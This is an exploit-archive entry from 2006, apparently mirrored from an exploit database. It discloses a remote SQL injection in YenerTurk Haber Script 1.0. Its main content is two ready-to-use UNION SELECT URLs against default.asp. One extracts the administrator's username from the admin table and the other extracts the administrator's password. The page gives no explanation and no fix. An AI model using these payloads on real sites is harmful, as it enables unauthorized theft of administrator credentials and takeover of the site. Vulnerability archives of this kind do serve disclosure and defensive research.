YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability
# Published : 2006-08-07
# Author : ASIANEAGLE
# Previous Title : QuestCMS (main.php) Remote File Include Vulnerability
# Next Title : PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability

#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality 
#Credit:ASIANEAGLE                                      
#Contact:admin@asianeagle.org                           


#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201

# www.Syue.com [2006-08-07]